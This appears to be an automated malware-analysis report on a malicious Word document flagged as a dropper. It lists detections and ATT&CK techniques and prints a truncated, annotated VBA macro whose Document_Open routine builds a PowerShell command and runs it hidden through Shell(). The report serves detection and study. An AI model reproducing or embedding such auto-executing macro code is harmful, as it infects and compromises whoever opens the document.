Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The file is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes a 'Shell()' call, indicating an attempt to execute arbitrary code. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6591643-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6591643-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17635 bytes |

SHA-256 of macros.bas: b08cc975c55c985bb63d3fe57e6b7e8d8b868597362aec38aaa8eb5659b19c6a
Preview script (first 1,000 lines of the extracted script; the extraction is truncated and is reproduced here with statement breaks restored and analyst comments added):

```vba
Attribute VB_Name = "JCWBzrKv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Builds the command string. The arithmetic on undeclared variables is dead-code
' padding; On Error Resume Next swallows any errors it raises.
Function NGIkV()
    On Error Resume Next
    jHipt = Atn(GSWEE + Sin(HiPbn) - 29213 / 22801)
    nputI = 82707 + 45191
    ijvjdr = 58449 / 49206
    oviJG = zojEjH * CSng(84700 * Fix(15192)) * qYGjW + CSng(YHrwT + CLng(UTwpWN)) / (zUiuQp * CSng(17066) - (89962 + Fix(lmuRj) - (73886 + CLng(VBHBS - Log(nnLmw) - 58616 + Int(kPNtt)))))
    WZAYX = wqMNn
    CmSmi = Atn(obqTri + Sin(IaktRj) - 79366 / 88769)
    wQiGl = 82788 + 92566
    HSHNld = 59854 / 18671
    IbziN = CLuMCi * CSng(64062 * Fix(92918)) * iEdjf + CSng(kbBYV + CLng(PMcsAi)) / (NubSK * CSng(94966) - (650 + Fix(wzLEdC) - (31167 + CLng(CHHQn - Log(AwKsp) - 74731 + Int(SUBANj)))))
    QSKBQ = UlFjYF
    YGiKSh = Atn(AprIcK + Sin(HRQcl) - 15938 / 61546)
    AHnqsj = 15968 + 67981
    HLdGz = 51204 / 88356
    tLXizi = wKwjP * CSng(51573 * Fix(29397)) * HKvYfa + CSng(VZQRA + CLng(ulvBUj)) / (wdlpq * CSng(39401) - (17280 + Fix(bZbas) - (95666 + CLng(hnjDGn - Log(zNhirC) - 48686 + Int(furqq)))))
    iCGGJj = soGwz
    Izvltl = Atn(LFisi + Sin(YVcBOi) - 97690 / 88518)
    qWOrV = 87280 + 26372
    BtIwz = 85398 / 64304
    OEizAz = hLhTG * CSng(14121 * Fix(17590)) * VEuaQ + CSng(oiLiz + CLng(pOPdh)) / (ETzYIJ * CSng(64247) - (59254 + Fix(dYdqR) - (63686 + CLng(smbSz - Log(ZaWOA) - 66675 + Int(SvElaD)))))
    rQOrI = rqZMsO
    ' The variables added to 80 are never assigned in the visible source (Empty, i.e. 0),
    ' so Chr$(80) yields "P" and the string starts "POwerSH": the PowerShell command
    ' the summary refers to. The remaining concatenated variables are outside the extract.
    NGIkV = iOoSvjhbs + Chr$(dwOwEIALXGf + 80 + wXQPQTTJPu) + "OwerSH" + uOibLE + IzOzajUoCm + dEjCpVqQaro + IzbpPMBjS
    vtcwz = Atn(zhwUQ + Sin(ssvZja) - 73461 / 5507)
    oWSwJ = 94245 + 36690
    hoPKb = 68611 / 47048
    XrEvl = CcuoUi * CSng(72474 * Fix(83661)) * UrQalL + CSng(WFfDNX + CLng(zovORT)) / (JwWwp * CSng(26555) - (58633 + Fix(Yjiwv) - (95208 + CLng(sWhqh - Log(wPiji) - 73600 + Int(AYPTXC)))))
    TOYsmL = ultWYR
    rSjCz = Atn(KUfKXS + Sin(ouNLf) - 94634 / 19381)
    NSCtB = 9043 + 99331
    WizOS = 37774 / 67266
    tlAzOF = mWbZh * CSng(54372 * Fix(11306)) * jGhwiv + CSng(PiuOaz + CLng(ihTAk)) / (nsnzt * CSng(65212) - (97658 + Fix(vzjqH) - (51049 + CLng(nUIUn - Log(VVEzi) - 28819 + Int(otFhrk)))))
    tCzXW = UkFXqA
End Function

' Executes whatever string it is handed (the OLE_VBA_SHELL finding).
Function MlPQSMiH(mpWzEO)
    On Error Resume Next
    zQGpi = Atn(OtjjbC + Sin(liwWR) - 23743 / 12476)
    qucMs = 82799 + 86873
    jNQoh = 61548 / 81391
    tBuamV = moidbS * CSng(72062 * Fix(16260)) * vAMac + CSng(HGJPj + CLng(UCacpV)) / (AEzkF * CSng(69969) - (97072 + Fix(tNZjE) - (72411 + CLng(RriSD - Log(unRWov) - 33522 + Int(DAlwlH)))))
    nmTdm = bXcZz
    OwtQit = Atn(PWSIO + Sin(wbHwJi) - 7096 / 41335)
    uhqNtB = 99423 + 39170
    BFjtvV = 21359 / 27024
    OiZBB = CpBzI * CSng(45664 * Fix(62648)) * tIZdSH + CSng(usNaWz + CLng(DvfjV)) / (YIuck * CSng(3485) - (47371 + Fix(bcqINk) - (93649 + CLng(UXhMb - Log(mLaiS) - 60165 + Int(FRcBWX)))))
    rMLqX = QdhCXo
    ' 2194 - 2194 evaluates to 0 (vbHide): the command runs in a hidden window.
    rQQCf = OIijiVC + Shell(prhwow + mpWzEO + EIBQLCT, 2194 - 2194)
    wcnwq = Atn(vfNvi + Sin(zcSVpA) - 34842 / 48392)
    WDEni = 18753 + 56508
    ZZlint = 2755 / 29895
    nUPfvn = pwwEIL * CSng(32926 * Fix(4013)) * IEdif + CSng(Bwtsj + CLng(oHrBkN)) / (svLcq * CSng(68637) - (77525 + Fix(GSjwEB) - (79072 + CLng(ZjvNmT - Log(lCEBA) - 80995 + Int(DYzMJ)))))
    zsrVi = twWVXl
End Function

' Auto-execution entry point (the OLE_VBA_DOCOPEN finding): runs when the document is opened
' and hands the string built by NGIkV to MlPQSMiH indirectly via Application.Run.
Private Sub Document_open()
    On Error Resume Next
    iZjMKw = Atn(XhIXb + Sin(Mwbji) - 99923 / 45475)
    GaWAN = 74189 + 65444
    oLCcCH = 98696 / 74323
    zukpXC = QDXtQ * CSng(10426 * Fix(93529)) * mitUbs + CSng(wBsASL + CLng(mjOhZ)) / (zHfKv * CSng(84884) - (62598 + Fix(wiVTK) - (76789 + CLng(WTSGpT - Log(jwWjpE) - 32169 + Int(iifvof)))))
    PzEYks = dIzMZ
    ZimZO = Atn(ZtWVD + Sin(sssam) - 54876 / 2493)
    bRdAii = 14285 + 92679
    XADtA = 89446 / 15309
    oHPuO = kIrXku * CSng(87200 * Fix(46971)) * rcDEG + CSng(ALJwj + CLng(zBcRfq)) / (LwJpi * CSng(80314) - (86607 + Fix(Hoovi) - (86375 + CLng(ICiCp - Log(nwFwiv) - 71305 + Int(OGFDr)))))
    sijrrf = aPFncN
    Application.Run CRhLKt + "MlPQSMiH" + AQhStEDGodB, LNYzY + NGIkV + jmIPmTN
    XEWoBV = Atn(UkoUT + Sin(Cjibb) - 35144 / 24107)
    akscCs = 27387 + 76956
    dIjdiq = 62875 / 61140
    ... (truncated)
```